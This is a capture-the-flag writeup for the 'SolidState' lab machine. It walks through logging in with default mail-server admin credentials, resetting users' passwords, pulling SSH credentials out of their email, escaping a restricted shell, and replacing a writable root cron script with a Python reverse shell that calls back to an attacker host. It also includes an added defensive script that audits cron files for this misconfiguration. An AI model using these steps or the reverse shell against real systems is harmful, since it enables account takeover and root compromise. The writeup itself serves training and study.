# SolidState

## Nmap

```
sudo nmap 10.10.10.51 -p- -sS -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### James SMTP Server

Looking at our nmap results we see the target system is running JAMES 2.3.2, an Apache mail server.

Some quick research shows that RCE is possible on version 2.3.2. However, this is not our attack vector.

The default login credentials for the admin interface on port 4555 are usually `root:root`. Connecting to the admin interface with telnet, we are able to authenticate.

![](/files/akMeqWKesw7d7lZjqOES)

Running the `HELP` command shows the available commands, and the `listusers` command then enumerates the known users.

![](/files/hrhEju12gskvuagCgZ5D)

### Password Resetting

We also see a command for resetting a user's password. From here I reset every single user's password and then logged into `pop3` using `telnet` in an attempt to discover sensitive information contained within emails.

```
# Reset mindy's password
setpassword mindy password
```

Then log in to POP3 over telnet.

```
telnet 10.10.10.51 110

USER mindy
PASS password
LIST
```

![](/files/TvNkpwNzXakxlj9rZnII)

Retrieving the message at index 2, we discover SSH credentials.

```
retr 2
```

![](/files/KXhxzK7dXRAkdcDTXLdP)

### SSH

We are then able to authenticate over SSH as the user Mindy.

![](/files/qGqyg5UYSNUOLqR7oNNC)

### Restricted Shell

After logging in we notice we are in an `rbash` shell, which is a restricted shell. I have previously covered `rbash` shell escapes in "Sunset Decoy", and I will be using the same technique here to escape the restricted shell.

{% content-ref url="/pages/-MXX-LxfUxtuJlpASLo0" %}
[SunsetDecoy](/pentest-everything/writeups/pg-play-or-vulnhub/linux/sunsetdecoy.md)
{% endcontent-ref %}

```bash
ssh mindy@10.10.10.51 -t "bash --noprofile"
```

![](/files/4cDZhUgN0UfD6mBqZU4N)

### User Flag

We are then able to grab the `user.txt` flag.

![](/files/F5WIye62rvDgcoOyx60D)

### Enumeration

After performing some basic enumeration steps I was unable to identify any interesting routes for escalation. I decided to upload a [`pspy`](https://github.com/DominicBreuker/pspy) binary to monitor for scheduled tasks and processes that might be running.

After uploading the binary to the target system, I then changed the permissions to allow execution.

```
chmod +x ./pspy32
```

Then I executed the binary.

In the output we notice the following Python script is being executed at a regular interval.

![](/files/fh4fMCIyi7RQTy5agGJC)

Inspecting the file, we notice it is owned by root; however, we have write permission on it, so anything we place in it will run with root's privileges on the next scheduled execution.

![](/files/xlwTYrGkIup59twSHake)
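The weakness here is a script run by root on a schedule that a low-privileged user can modify. The following audit is an added example (it is not part of the original writeup and does not reproduce the box's actual file or schedule): it parses system-crontab style lines, resolves the absolute path each root job executes, and flags any such script that group or other users can write, or that sits in a directory where anyone could replace it. The crontab lines, file names and permissions in `demo()` are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Audit cron-launched scripts for write access by non-root users.

Added example, not code from the writeup. Paths and cron lines in demo()
are constructed; the real box's script name and interval are not stated here.
"""
import os
import re
import stat
import tempfile

# System-crontab format (/etc/crontab, /etc/cron.d): five time fields,
# then the user, then the command. Per-user crontabs have no user field
# and are not handled by this parser.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def script_paths_from_cron(lines):
    """Return (user, path) for each job whose command names an absolute path.

    Interpreter prefixes such as 'python3 /path/job.py' are skipped so the
    script itself, not the interpreter, is what gets audited.
    """
    found = []
    for line in lines:
        line = line.strip()
        # Skip blanks, comments and environment assignments (SHELL=/bin/sh)
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        for token in m.group("cmd").split():
            if token.startswith("/"):
                found.append((m.group("user"), token))
                break
    return found


def writable_by_non_owner(path):
    """True if group/other can write the file, or can replace it in its directory."""
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    parent_mode = os.stat(os.path.dirname(path) or "/").st_mode
    # A world-writable parent without the sticky bit lets anyone rename or
    # replace the script even when the file itself is read-only.
    return bool(parent_mode & stat.S_IWOTH) and not parent_mode & stat.S_ISVTX


def audit(cron_lines):
    """Return the root-executed scripts that a non-root user could modify."""
    findings = []
    for user, path in script_paths_from_cron(cron_lines):
        if user == "root" and os.path.exists(path) and writable_by_non_owner(path):
            findings.append(path)
    return findings


def demo():
    """Constructed scenario: one writable root job, one safe job, one non-root job."""
    work = tempfile.mkdtemp()          # private 0700 dir, so the parent check stays clean
    weak = os.path.join(work, "cleanup.py")
    safe = os.path.join(work, "rotate.sh")
    for path, mode in ((weak, 0o666), (safe, 0o644)):
        with open(path, "w") as fh:
            fh.write("# placeholder body\n")
        os.chmod(path, mode)
    cron = [
        "SHELL=/bin/sh",
        "# constructed sample crontab",
        f"*/3 * * * * root python3 {weak}",   # root runs a world-writable script
        f"0 * * * * root {safe}",             # root runs a script only root can write
        f"*/5 * * * * mindy python3 {weak}",  # same script, but not run as root
    ]
    return [os.path.basename(p) for p in audit(cron)]


if __name__ == "__main__":
    print("scripts run by root but writable by others:", demo())
```

Pointing `audit()` at the real `/etc/crontab` and `/etc/cron.d/*` contents (with `sudo` read access) gives a quick check for this class of misconfiguration; the fix is to make the scheduled script root-owned with mode `0755` or tighter and to keep it out of world-writable directories.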

### Privilege Escalation

To take advantage of this for privilege escalation, we can clear the contents of the file and use `nano` to insert a Python reverse shell.

```
# Erase file contents
echo > tmp.py
```

Then use `nano` to insert the following reverse shell:

```python
import socket, os, pty

# Connect back to the listener on the attacking host (address and port from the writeup)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.6", 4444))
# Redirect stdin, stdout and stderr over the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell attached to the connection
pty.spawn("sh")
```

![](/files/4T8gUIzXZZi2yMFIiUnp)

### Root Flag

A few minutes later we receive a **root** shell, from which we can grab the `root.txt` flag.

![](/files/NjUJsSFZFSqQTG9P2Q9E)
